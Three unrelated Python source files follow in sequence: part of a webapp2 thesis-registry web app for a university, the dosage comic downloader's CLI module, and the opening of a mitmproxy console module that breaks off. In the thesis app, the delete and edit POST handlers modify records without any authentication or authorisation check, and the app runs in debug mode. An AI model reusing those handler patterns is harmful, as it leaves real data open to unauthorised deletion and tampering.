student.student_graduated = int(self.request.get('student_graduated'))
student.student_department = ndb.Key('Department', student_department_key.id())
student.student_bday = self.request.get('student_bday')
student.key = ndb.Key(Student, id)
student.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'first_name':student.student_fname,
'last_name':student.student_sname,
'full_name':student.student_full,
'phone':student.student_phone,
'email':student.student_email,
'student_number':student.student_number,
'year_graduated':student.student_graduated
}
}
self.response.out.write(json.dumps(response))
class UniversityDeleteHandler(webapp2.RequestHandler):
def post(self, id):
university = University.get_by_id(id)
university.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class UniversityEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
university = University.get_by_id(id)
data = {
'links' : links,
'item' : university,
'logout_url':logout_url,
'user':user
}
template = JINJA_ENVIRONMENT.get_template('/pages/universityedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
university = University()
university.university_name = self.request.get('university_name')
university.university_initial = self.request.get('university_initial')
university.university_address = self.request.get('university_address')
university.key = ndb.Key(University, id)
university.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'university_name': university.university_name,
'university_initial': university.university_initial,
'university_address': university.university_address
}
}
self.response.out.write(json.dumps(response))
class CollegeDeleteHandler(webapp2.RequestHandler):
def post(self, id):
college = College.get_by_id(id)
college.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class CollegeEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
college = College.get_by_id(id)
depts = []
for c in college.college_departments:
department = Department.query(Department.key == c)
logging.info(department)
if department is not None:
department = department.get()
depts.append(department.department_name)
university = University.query(University.key == college.college_university)
university = university.get()
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
data = {
'links':links,
'item' : college,
'univ' : university.university_name,
'dept' : depts,
'logout_url':logout_url,
'user':user.first_name
}
for i in range(0, len(depts)):
data['college_dept_' + str(i)] = depts[i]
logging.info(data)
template = JINJA_ENVIRONMENT.get_template('/pages/collegeedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
college = College()
college_university_temp = University.query(University.university_name == self.request.get('college_university'))
college_university_temp = college_university_temp.get()
college_university_key = college_university_temp.key
department = college.college_departments
dept_temp = []
i = 0
if self.request.get('college_department_' + str(i)) is not None and self.request.get('college_department_' + str(i)) != '':
while self.request.get('college_department_' + str(i)) is not None and self.request.get('college_department_' + str(i)) != '':
college_dept_temp = Department.query(Department.department_name == self.request.get('college_department_' + str(i)))
college_dept_temp = college_dept_temp.get()
if college_dept_temp.key not in department:
department.append(college_dept_temp.key)
i += 1
college.college_departments = department
else:
college.college_departments = []
college.college_university = ndb.Key('University', college_university_key.id())
college.college_name = self.request.get('college_name')
college.key = ndb.Key(College, id)
college.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'college_name': college.college_name
}
}
self.response.out.write(json.dumps(response))
class DepartmentDeleteHandler(webapp2.RequestHandler):
def post(self, id):
department = Department.get_by_id(id)
dept = []
dept.append(department.key)
logging.info(dept)
college = College.query(College.college_departments.IN(dept))
college = college.get()
logging.info(college)
depts = []
depts = college.college_departments
depts.remove(department.key)
college.college_departments = depts
college.key = college.key
college.put()
department.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class DepartmentEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
department = Department.get_by_id(id)
if department.department_college is not None:
college = College.query(College.key == department.department_college)
college = college.get()
college = college.college_name
if department.department_chair is not None:
chairperson = Faculty.query(Faculty.key == department.department_chair)
chairperson = chairperson.get()
chairperson = chairperson.faculty_full
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
data = {
'links':links,
'item' : department,
'college' : college,
'chairperson':chairperson,
'logout_url':logout_url,
'user':user.first_name
}
logging.info(data)
template = JINJA_ENVIRONMENT.get_template('/pages/departmentedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
department = Department()
department_college_temp = College.query(College.college_name == self.request.get('department_college'))
department_college_temp = department_college_temp.get()
department_college_key = department_college_temp.key
department_chair_temp = Faculty.query(Faculty.faculty_full == self.request.get('department_chair'))
department_chair_temp = department_chair_temp.get()
department_chair_key = department_chair_temp.key
department.department_college = ndb.Key('College', department_college_key.id())
department.department_name = self.request.get('department_name')
department.department_chair = ndb.Key('Faculty', department_chair_key.id())
department.key = ndb.Key(Department, id)
department.put()
college = College.query(College.key == department.department_college)
c = college.get()
logging.info(c)
collegelist = []
collegelist = c.college_departments
logging.info(collegelist)
collegelist.append(department.key)
c.college_departments = collegelist
c.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'department_name': department.department_name
}
}
self.response.out.write(json.dumps(response))
class ThesisDeleteHandler(webapp2.RequestHandler):
def post(self, id):
thesis = thesisentry.get_by_id(int(id))
thesis.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class ThesisEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
thesis = thesisentry.get_by_id(int(id))
adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
adviser = adviser.faculty_full
proponents = []
for t in thesis.thesis_proponent:
p = Student.get_by_id(t.id())
proponents.append(p.student_full)
department = Department.get_by_id(thesis.thesis_department.id())
department = department.department_name
template_values = {
'links' : links,
'id': id,
'proponents':proponents,
'adviser':adviser,
'department':department,
'thesis':thesis,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesisedit.html')
self.response.write(template.render(template_values))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
thesis = thesisentry()
user = User()
faculty = Faculty()
loggedin_user = users.get_current_user()
user_key = ndb.Key('User', loggedin_user.user_id())
thesis_proponents = []
i = 0
while self.request.get('thesis_proponent_' + str(i)) is not None and self.request.get('thesis_proponent_' + str(i)) != '':
thesis_proponent_temp = Student.query(Student.student_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponent_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponents.append(None)
i += 1
logging.info(thesis_proponents)
thesis_adviser_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_adviser'))
thesis_adviser_temp = thesis_adviser_temp.get()
thesis_adviser_key = thesis_adviser_temp.key
thesis_department_temp = Department.query(Department.department_name == self.request.get('thesis_department'))
thesis_department_temp = thesis_department_temp.get()
thesis_department_key = thesis_department_temp.key
thesis.thesis_author = user_key
thesis.thesis_year = self.request.get('thesis_year')
thesis.thesis_title = self.request.get('thesis_title')
thesis.thesis_abstract = self.request.get('thesis_abstract')
thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser_key.id())
thesis.thesis_section = self.request.get('thesis_section')
thesis.thesis_proponent = thesis_proponents
thesis.thesis_department = ndb.Key('Department', thesis_department_key.id())
thesis.key = ndb.Key(thesisentry, int(id))
tags = []
for t in thesis.thesis_title.split():
if len(t) >= 3 and t not in tags:
tags.append(t)
thesis.thesis_tags = tags
thesis.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result': 'OK',
'data': {
'id' : thesis.key.urlsafe(),
'year': thesis.thesis_year,
'title': thesis.thesis_title,
'abstract': thesis.thesis_abstract,
'section': thesis.thesis_section,
'author': user_key.get() + ' ' + user_key.get().last_name
}
}
self.response.out.write(json.dumps(response))
class ThesisListAll(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesislist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesislist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class ThesisListFilter(webapp2.RequestHandler):
def get(self, value):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
logging.info(value)
thesisdet = thesisentry.query(thesisentry.thesis_year == value).fetch()
selected = value
if len(thesisdet) == 0:
faculty = Faculty.get_by_id(value)
logging.info(faculty)
if faculty is not None and len(thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()) != 0:
thesisdet = thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()
selected = faculty.faculty_full
else:
university = University.get_by_id(value)
college = College.query(College.college_university == university.key)
college = college.get()
department = Department.query(Department.department_college == college.key)
department = department.get()
thesisdet = thesisentry.query(thesisentry.thesis_department == department.key).fetch()
selected = university.university_name
logout_url = users.create_logout_url('/')
link_text = 'Logout'
template_values = {
'thesis': thesisdet,
'selected': selected,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesislistfiltered.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class ThesisDetailsHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
thesis = thesisentry.get_by_id(int(id))
adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
adviser = adviser.faculty_full
proponents = []
for t in thesis.thesis_proponent:
p = Student.get_by_id(t.id())
proponents.append(p.student_full)
tags = thesis.thesis_tags
t = thesisentry.query(thesisentry.thesis_tags.IN(tags)).fetch()
edit_link = {}
edit_link['Edit Thesis Entry'] = '/thesis/' + id + '/edit'
template_values = {
'links': links,
'edit_link':edit_link,
'related':t,
'proponents':proponents,
'adviser':adviser,
'thesis':thesis,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesisdetail.html')
self.response.write(template.render(template_values))
else:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
thesis = thesisentry.get_by_id(int(id))
adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
adviser = adviser.faculty_full
proponents = []
for t in thesis.thesis_proponent:
p = Student.get_by_id(t.id())
proponents.append(p.student_full)
tags = thesis.thesis_tags
t = thesisentry.query(thesisentry.thesis_tags.IN(tags)).fetch()
edit_link = {}
edit_link[''] = '#'
template_values = {
'edit_link':edit_link,
'related':t,
'proponents':proponents,
'adviser':adviser,
'thesis':thesis,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesisdetail.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class SearchHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/search.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/search.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
keyword = []
keyword = (self.request.get('search_keyword')).lower().split()
results = thesisentry.query(thesisentry.thesis_tags.IN(keyword)).fetch()
if len(results) == 0:
keyword = []
keyword = (self.request.get('search_keyword')).lower().split()
stud_res = Student.query(Student.student_name_portions.IN(keyword)).fetch()
keys = []
for s in stud_res:
keys.append(s.key)
results = thesisentry.query(thesisentry.thesis_proponent.IN(keys)).fetch()
logging.info(results)
search_results = {}
for r in results:
search_results[r.thesis_title] = r.key.id()
self.response.headers['Content-Type'] = 'application.json'
response = {
'result':'OK',
'data': search_results
}
self.response.out.write(json.dumps(response))
app = webapp2.WSGIApplication([
('/api/thesis', APIHandler),
('/register', RegistrationHandler),
('/login', LoginHandler),
('/home', MainPageHandler),
('/thesis/create', ThesisPageHandler),
('/faculty/create', FacultyHandler),
('/student/create', StudentHandler),
('/university/create', UniversityHandler),
('/college/create', CollegeHandler),
('/department/create', DepartmentHandler),
('/data/import', DataImportHandler),
('/setup', SetupHandler),
('/faculty/list', FacultyListHandler),
('/faculty/api', FacultyAPIHandler),
('/thesis/create/api', ThesisCreateAPI),
('/student/api', StudentsAPIHandler),
('/student/list', StudentListHandler),
('/university/api', UniversityAPIHandler),
('/university/list', UniversityListHandler),
('/college/api', CollegeAPIHandler),
('/college/list', CollegeListHandler),
('/department/api', DepartmentAPIHandler),
('/department/list', DepartmentListHandler),
('/faculty/(.*)/delete', FacultyDeleteHandler),
('/faculty/(.*)', FacultyEditHandler),
('/student/(.*)/delete', StudentDeleteHandler),
('/student/(.*)', StudentEdithandler),
('/university/(.*)/delete', UniversityDeleteHandler),
('/university/(.*)', UniversityEditHandler),
('/college/(.*)/delete', CollegeDeleteHandler),
('/college/(.*)', CollegeEditHandler),
('/department/(.*)/delete', DepartmentDeleteHandler),
('/department/(.*)', DepartmentEditHandler),
('/thesis/(.*)/delete', ThesisDeleteHandler),
('/thesis/(.*)/edit', ThesisEditHandler),
('/thesis/list/all', ThesisListAll),
('/thesis/list/(.*)', ThesisListFilter),
('/thesis/(.*)', ThesisDetailsHandler),
('/search', SearchHandler),
('/', MainPageHandler)
], debug=True)
|
|
# SPDX-License-Identifier: MIT
# Copyright (C) 2004-2008 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2020 Tobias Gruetzmacher
import argparse
import contextlib
import os
import platform
from pathlib import Path
import appdirs
from . import events, configuration, singleton, director
from . import AppName, __version__
from .output import out
from .scraper import scrapers as allscrapers
from .util import internal_error, strlimit
class ArgumentParser(argparse.ArgumentParser):
"""Custom argument parser."""
def print_help(self, file=None):
"""Paginate help message on TTYs."""
with out.pager():
out.info(self.format_help())
Examples = """\
EXAMPLES
List available comics:
dosage -l
Get the latest comic of for example CalvinAndHobbes and save it in the "Comics"
directory:
dosage CalvinAndHobbes
If you already have downloaded several comics and want to get the latest
strips of all of them:
dosage --continue @
"""
# Making our config roaming seems sensible
userdirs = appdirs.AppDirs(appname=AppName, appauthor=False, roaming=True)
def setup_options():
"""Construct option parser.
@return: new option parser
@rtype argparse.ArgumentParser
"""
parser = ArgumentParser(
description="A comic downloader and archiver.",
epilog=Examples,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-v', '--verbose', action='count', default=0,
help='provides verbose output, use multiple times for more verbosity')
parser.add_argument('-n', '--numstrips', action='store', type=int, default=0,
help='traverse and retrieve the given number of comic strips;'
' use --all to retrieve all comic strips')
parser.add_argument('-a', '--all', action='store_true',
help='traverse and retrieve all comic strips')
parser.add_argument('-c', '--continue', action='store_true', dest='cont',
help='traverse and retrieve comic strips until an existing one is found')
parser.add_argument('-b', '--basepath', action='store', default='Comics',
metavar='PATH',
help='set the path to create invidivual comic directories in, default is Comics')
parser.add_argument('--baseurl', action='store', metavar='PATH',
help='the base URL of your comics directory (for RSS, HTML, etc.);'
' this should correspond to --base-path')
parser.add_argument('-l', '--list', action='store_true',
help='list available comic modules')
parser.add_argument('--singlelist', action='store_true',
help='list available comic modules in a single column list')
parser.add_argument('--version', action='store_true',
help='display the version number')
parser.add_argument('--vote', action='store_true',
help='vote for the selected comics')
parser.add_argument('-m', '--modulehelp', action='store_true',
help='display help for comic modules')
parser.add_argument('-t', '--timestamps', action='store_true',
help='print timestamps for all output at any info level')
parser.add_argument('-o', '--output', action='append', dest='handler',
choices=events.getHandlerNames(),
help='sets output handlers for downloaded comics')
parser.add_argument('--no-downscale', action='store_false',
dest='allowdownscale',
help='prevent downscaling when using html or rss handler')
parser.add_argument('-p', '--parallel', action='store', type=int, default=1,
help='fetch comics in parallel. Specify the number of connections')
parser.add_argument('--adult', action='store_true',
help='confirms that you are old enough to view adult content')
parser.add_argument('--allow-multiple', action='store_true',
help='allows multiple instances to run at the same time.'
' Use if you know what you are doing.')
# used for development testing prev/next matching
parser.add_argument('--dry-run', action='store_true',
help=argparse.SUPPRESS)
# multimatch is only used for development, eg. testing if all comics of
# a scripted plugin are working
parser.add_argument('--multimatch', action='store_true',
help=argparse.SUPPRESS)
# List all comic modules, even those normally suppressed, because they
# are not "real" (moved & removed)
parser.add_argument('--list-all', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('comic', nargs='*',
help='comic module name (including case insensitive substrings)')
try:
import argcomplete
argcomplete.autocomplete(parser)
except ImportError:
pass
return parser
def display_version(verbose):
"""Display application name, version, copyright and license."""
print(configuration.App)
print("Using Python {} ({}) on {}".format(platform.python_version(),
platform.python_implementation(), platform.platform()))
print(configuration.Copyright)
print(configuration.Freeware)
print("For support see", configuration.SupportUrl)
if verbose:
# search for updates
from .updater import check_update
result, value = check_update()
if result:
if value:
version, url = value
if url is None:
# current version is newer than online version
text = ('Detected local or development version %(currentversion)s. '
'Available version of %(app)s is %(version)s.')
else:
# display update link
text = ('A new version %(version)s of %(app)s is '
'available at %(url)s.')
attrs = dict(version=version, app=AppName,
url=url, currentversion=__version__)
print(text % attrs)
else:
if value is None:
value = 'invalid update file syntax'
text = ('An error occured while checking for an '
'update of %(app)s: %(error)s.')
attrs = dict(error=value, app=AppName)
print(text % attrs)
return 0
def set_output_info(options):
"""Set global output level and timestamp option."""
out.level = 0
out.level += options.verbose
out.timestamps = options.timestamps
def display_help(options):
"""Print help for comic strips."""
errors = 0
try:
for scraperobj in director.getScrapers(options.comic, options.basepath, listing=True):
errors += display_comic_help(scraperobj)
except ValueError as msg:
out.exception(msg)
return 2
return errors
def display_comic_help(scraperobj):
"""Print help for a comic."""
orig_context = out.context
out.context = scraperobj.name
try:
out.info('URL: {}'.format(scraperobj.url))
out.info('Language: {}'.format(scraperobj.language()))
if scraperobj.adult:
out.info(u"Adult comic, use option --adult to fetch.")
disabled = scraperobj.getDisabledReasons()
if disabled:
out.info(u"Disabled: " + " ".join(disabled.values()))
if scraperobj.help:
for line in scraperobj.help.splitlines():
out.info(line)
return 0
except ValueError as msg:
out.exception(msg)
return 1
finally:
out.context = orig_context
def vote_comics(options):
"""Vote for comics."""
errors = 0
try:
for scraperobj in director.getScrapers(options.comic, options.basepath,
options.adult,
options.multimatch):
errors += vote_comic(scraperobj)
except ValueError as msg:
out.exception(msg)
errors += 1
return errors
def vote_comic(scraperobj):
"""Vote for given comic scraper."""
errors = 0
orig_context = out.context
out.context = scraperobj.name
try:
scraperobj.vote()
out.info(u'Vote submitted.')
except Exception as msg:
out.exception(msg)
errors += 1
finally:
out.context = orig_context
return errors
def run(options):
"""Execute comic commands."""
set_output_info(options)
# ensure only one instance of dosage is running
if not options.allow_multiple:
singleton.SingleInstance()
if options.version:
return display_version(options.verbose)
if options.list:
return do_list()
if options.singlelist or options.list_all:
return do_list(column_list=False, verbose=options.verbose,
listall=options.list_all)
# after this a list of comic strips is needed
if not options.comic:
out.warn(u'No comics specified, bailing out!')
return 1
add_user_scrapers()
if options.modulehelp:
return display_help(options)
if options.vote:
return vote_comics(options)
return director.getComics(options)
def add_user_scrapers():
"""Add extra comic modules from the user data directory. This uses two
different locations: The "system-native" location and paths matching the
XDG basedir spec. While XDG isn't a thing on macOS and Windows, some users
(and developers) like to use these paths cross-plattform, therefore we
support both."""
dirs = set()
dirs.add(userdirs.user_data_dir)
with xdg_system():
dirs.add(userdirs.user_data_dir)
dirs = (Path(x) / 'plugins' for x in dirs)
for d in dirs:
allscrapers.adddir(d)
@contextlib.contextmanager
def xdg_system():
"""context manager to do something with appdirs while forcing the system to
be "linux2", which implements the XDG base dir spec.
"""
oldsys = appdirs.system
appdirs.system = 'linux2'
try:
yield
finally:
appdirs.system = oldsys
def do_list(column_list=True, verbose=False, listall=False):
"""List available comics."""
add_user_scrapers()
with out.pager():
out.info(u'Available comic scrapers:')
out.info(u'Comics tagged with [{}] require age confirmation'
' with the --adult option.'.format(TAG_ADULT))
out.info(u'Non-english comics are tagged with [%s].' % TAG_LANG)
scrapers = sorted(allscrapers.get(listall),
key=lambda s: s.name.lower())
if column_list:
num, disabled = do_column_list(scrapers)
else:
num, disabled = do_single_list(scrapers, verbose=verbose)
out.info(u'%d supported comics.' % num)
if disabled:
out.info('')
out.info(u'Some comics are disabled, they are tagged with'
' [{}:REASON], where REASON is one of:'.format(TAG_DISABLED))
for k in disabled:
out.info(u' %-10s %s' % (k, disabled[k]))
return 0
def do_single_list(scrapers, verbose=False):
"""Get list of scraper names, one per line."""
disabled = {}
for scraperobj in scrapers:
if verbose:
display_comic_help(scraperobj)
else:
out.info(get_tagged_scraper_name(scraperobj, reasons=disabled))
return len(scrapers) + 1, disabled
def do_column_list(scrapers):
"""Get list of scraper names with multiple names per line."""
disabled = {}
width = out.width
# limit name length so at least two columns are there
limit = (width // 2) - 8
names = [get_tagged_scraper_name(scraperobj, limit=limit, reasons=disabled)
for scraperobj in scrapers]
num = len(names)
maxlen = max(len(name) for name in names)
names_per_line = max(width // (maxlen + 1), 1)
while names:
out.info(u''.join(name.ljust(maxlen) for name in
names[:names_per_line]))
del names[:names_per_line]
return num, disabled
TAG_ADULT = "adult"
TAG_LANG = "lang"
TAG_DISABLED = "dis"
def get_tagged_scraper_name(scraperobj, limit=None, reasons=None):
"""Get comic scraper name."""
tags = []
if scraperobj.adult:
tags.append(TAG_ADULT)
if scraperobj.lang != "en":
tags.append("%s:%s" % (TAG_LANG, scraperobj.lang))
disabled = scraperobj.getDisabledReasons()
if disabled and reasons is not None:
reasons.update(disabled)
for reason in disabled:
tags.append("%s:%s" % (TAG_DISABLED, reason))
if tags:
suffix = " [" + ", ".join(tags) + "]"
else:
suffix = ""
name = scraperobj.name
if limit is not None:
name = strlimit(name, limit)
return name + suffix
def main(args=None):
"""Parse options and execute commands."""
try:
options = setup_options().parse_args(args=args)
options.basepath = os.path.expanduser(options.basepath)
return run(options)
except KeyboardInterrupt:
print("Aborted.")
return 1
except Exception:
internal_error()
return 2
|
|
import re
import urwid
from mitmproxy.tools.console import common
from mitmproxy.tools.console import signals
from mitmproxy.tools.console import statusbar
from mitmproxy.tools.console import flowlist
from mitmproxy.tools.console import flowview
from mitmproxy.tools.console import commands
from mitmproxy.tools.console import keybindings
from mitmproxy.tools.console import options
from mitmproxy.tools.console import overlay
from mitmproxy.tools.console import help
from mitmproxy.tools.console import grideditor
from mitmproxy.tools.console import eventlog
class StackWidget(urwid.Frame):
def __init__(self, window, widget, title, focus):
self.is_focused = focus
self.window = window
if title:
header = urwid.AttrWrap(
urwid.Text(title),
"heading" if focus else "heading_inactive"
)
else:
header = None
super().__init__(
widget,
header=header
)
def mouse_event(self, size, event, button, col, row, focus):
if event == "mouse press" and button == 1 and not self.is_focused:
self.window.switch()
return super().mouse_event(size, event, button, col, row, focus)
def keypress(self, size, key):
# Make sure that we don't propagate cursor events outside of the widget.
# Otherwise, in a horizontal layout, urwid's Pile would change the focused widget
# if we cannot scroll any further.
ret = super().keypress(size, key)
command = self._command_map[ret] # awkward as they don't implement a full dict api
if command and command.startswith("cursor"):
return None
return ret
class WindowStack:
def __init__(self, master, base):
self.master = master
self.windows = dict(
flowlist = flowlist.FlowListBox(master),
flowview = flowview.FlowView(master),
commands = commands.Commands(master),
